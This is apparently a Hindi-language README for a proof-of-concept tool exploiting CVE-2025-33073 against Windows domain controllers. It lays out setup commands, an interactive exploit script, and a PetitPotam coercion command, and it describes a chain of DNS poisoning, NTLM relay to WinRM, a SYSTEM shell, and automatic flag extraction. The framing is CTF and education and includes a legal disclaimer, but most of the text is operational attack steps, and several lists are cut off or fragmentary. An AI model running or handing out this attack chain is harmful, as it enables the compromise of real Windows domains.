
DNSAdmins विशेषाधिकारों और WinRM सक्षम के साथ Windows डोमेन नियंत्रकों को लक्षित करने वाले CVE-2025-33073 के लिए सार्वभौमिक शोषण उपकरण।

CVE-2025-33073 के लिए सार्वभौमिक शोषण उपकरण जो DNSAdmins विशेषाधिकारों और WinRM सक्षम के साथ विंडोज डोमेन कंट्रोलर्स को लक्षित करता है।
CVE-2025-33073 एक गंभीर कमजोरी है जो हमलावरों को निम्नलिखित के संयोजन के माध्यम से विंडोज डोमेन कंट्रोलर्स पर SYSTEM-स्तरीय कोड निष्पादन प्राप्त करने की अनुमति देती है:
यह PoC एक सार्वभौमिक, स्वचालित शोषण ढांचा प्रदान करता है जो किसी भी डोमेन, किसी भी उपयोगकर्ता नाम और किसी भी CTF वातावरण के साथ संगत है।
# Required tools
sudo apt-get update
sudo apt-get install -y python3 python3-pip netcat-openbsd dnsutils
# Python dependencies
pip3 install impacket netexec
# Clone krbrelayx
git clone https://github.com/dirkjanm/krbrelayx
# Clone this repository
git clone https://github.com/uziii2208/CVE-2025-33073
cd CVE-2025-33073
# Make exploit executable
chmod +x exploit.sh
# Verify tools installation
./exploit.sh # Will check all dependencies
./exploit.sh
स्क्रिप्ट निम्नलिखित पूछेगी:
टर्मिनल 1 - शोषण चलाएं:
./exploit.sh
# Follow the interactive prompts
# Wait for: "[!] RELAY READY! OPEN NEW TERMINAL → PASTE COERCE COMMAND!"
टर्मिनल 2 - कोएर्स कमांड निष्पादित करें (टर्मिनल 1 आउटपुट से कॉपी करें):
nxc smb 192.168.1.10 -u 'username' -p 'password' \
-M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.corp.local
परिणाम:
स्क्रिप्ट स्वचालित रूप से खोजती और निकालती है:
*flag*.txt*root*.txt*user*.txtproof.txtC:\Users\*\Desktop\ में स्थित।
सभी आउटपुट /0pwn_exploit_<TIMESTAMP>/ में सहेजे गए:
relay.log - NTLM रिले सर्वर आउटपुटdns.log - DNS संचालन लॉगshell_output.log - शेल कमांड और निकाले गए फ्लैग1. DNS विषाक्तीकरण (krbrelayx.dnstool)
└─> हमलावर IP की ओर इशारा करने वाले DNS रिकॉर्ड को संशोधित/बनाएं
2. NTLM रिले सर्वर (ntlmrelayx.py)
└─> आने वाले NTLM प्रमाणीकरण के लिए सुनें
3. जबरदस्ती (nxc + PetitPotam)
└─> DC को हमलावर IP पर प्रमाणित करने के लिए मजबूर करें
4. रिले → WinRMS
└─> लक्ष्य WinRMS पर प्रमाणीकरण रिले करें
5. SYSTEM शेल
└─> SYSTEM के रूप में कमांड निष्पादित करें
6. स्वचालित फ्लैग निष्कर्षण
└─> सभी फ्लैग खोजें और निकालें
exploit.sh में LONGHOST वेरिएबल संपादित करें:
LONGHOST="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"
विभिन्न फ़ाइल पैटर्न खोजने के लिए run_shell_commands() फ़ंक्शन को संशोधित करें:
# Add custom patterns here
echo "powershell \"Get-ChildItem -Path 'C:\\Users\\*\\Desktop' -Include '*custom*.txt' ...\""
यह PoC निम्नलिखित के लिए प्रदान किया गया है:
कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।
net group "DNSAdmins" /domainping <DC_IP>nxc smb <DC_IP> -u username -p passwordwinrm quickconfigshell_output.log जांचेंnc -zv 127.0.0.1 <SHELL_PORT>run_shell_commands() में स्लीप टाइमआउट बढ़ाएं/0pwn_exploit_1234567890/
├── relay.log # NTLM relay server output
├── dns.log # DNS operation details
└── shell_output.log # Extracted flags & command output
# View relay events
grep "SYSTEM SHELL" /0pwn_exploit_*/relay.log
# Extract all flags
grep "===" /0pwn_exploit_*/shell_output.log -A 10
# Check DNS operations
cat /0pwn_exploit_*/dns.log
[डेमो और स्क्रीनशॉट] - [जल्द ही आ रहा है]

0pwn (uziii2208) - मूल अवधारणा और अनुसंधान AI संवर्धित - v1.0 सुधार और स्वचालित फ्लैग निष्कर्षण
MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें
कानूनी सूचना:
यह सॉफ़्टवेयर केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है और कानून द्वारा दंडनीय है।
इस उपकरण का उपयोग करके, आप सहमत हैं:
योगदान का स्वागत है! कृपया issues और pull requests सबमिट करें।
समस्याओं, प्रश्नों या सुधारों के लिए:
स्थिति: ✅ परीक्षित और सत्यापित संस्करण: 1.0 (सार्वभौमिक) अंतिम अद्यतन: 2025